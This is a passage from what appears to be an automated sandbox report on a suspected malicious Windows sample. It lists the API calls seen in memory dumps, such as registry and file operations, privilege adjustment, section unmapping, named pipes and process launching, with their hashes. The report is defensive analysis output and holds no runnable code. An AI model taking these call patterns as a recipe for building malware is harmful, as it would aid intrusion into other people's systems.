    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 36c43c169b7f4adfcc7eed8db55d242cf47c4c2cff2d35238d5400cc3024a577
  • Instruction ID: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
  • Opcode Fuzzy Hash: 93F078708B2E8BC1CD9158C9160535692C06F30E68E9C9B137824F966B6B20312C9F9D
  • Instruction Fuzzy Hash: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
APIs
  • memset.NTDLL ref: 01B32CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 01B32CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 01B32D14
  • lstrcpyW.KERNEL32(00000000,01B38224), ref: 01B32D29
  • lstrlen.KERNEL32(01B37494,?,?,?,?,?,?,?,?,?,?,01B318D7,?), ref: 01B32D46
  • lstrcpyW.KERNEL32(00000000,01B384B8), ref: 01B32D77
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • wsprintfW.USER32 ref: 01B32DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 01B32DE3
  • CoUninitialize.OLE32 ref: 01B32DF7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: GetLastError$CloseHandleCreateFileGetModuleHandleGetWindowsDirectoryHeapFreeRtlAllocateHeapStrChrWriteFilewsprintf
  • String ID:
  • API String ID: 2627060994-0
  • Opcode ID: db8d6b5184187aba615ed9859a1217546e47d51c2a19850b1dde47917d77b9bd
  • Instruction ID: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
  • Opcode Fuzzy Hash: 00E05538564C02C3C4279AA888803BEDA41B3801C1E8E0212FA002A5BAAB0323C88F63
  • Instruction Fuzzy Hash: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
  • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
  • StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
  • wsprintfA.USER32 ref: 001C15D0
  • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
  • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
  • WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
  • GetLastError.KERNEL32 ref: 001C1615
  • CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
  • GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 33
  • API ID: lstrlen$CloseHandleDeleteFileHeapFreeMapViewOfFileRtlAllocateHeapUnmapViewOfFilewcstombs
  • String ID:
  • API String ID: 3071814901-0
  • Opcode ID: d05e3ff4273796c9b17326ba3024fd4693d54f1ec967c9ade7a5abc202e65e4f
  • Instruction ID: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
  • Opcode Fuzzy Hash: 8DF08B71654AC2CBD22778A6A6517BBF901FB532C3C4E3732DC40251681F4232D22B1B
  • Instruction Fuzzy Hash: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
APIs
    • Part of subcall function 001C7262: memset.NTDLL ref: 001C7284
    • Part of subcall function 001C7262: lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
    • Part of subcall function 001C7262: OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
    • Part of subcall function 001C7262: CloseHandle.KERNEL32(?), ref: 001C7331
  • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 001C4D32
  • CloseHandle.KERNEL32(?), ref: 001C4D3E
  • lstrlenW.KERNEL32(00000000), ref: 001C4D58
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C4D69
  • wcstombs.NTDLL ref: 001C4D7A
  • lstrlen.KERNEL32(?), ref: 001C4D87
    • Part of subcall function 001D9462: lstrlen.KERNEL32(-00000002,00000000,?,-00000002,-00000002,?,001C4D99), ref: 001D9472
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • UnmapViewOfFile.KERNEL32(?,?,?,?,00000000,00000001), ref: 001C4DBC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C4DCE
  • DeleteFileW.KERNEL32(?), ref: 001C4DDC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
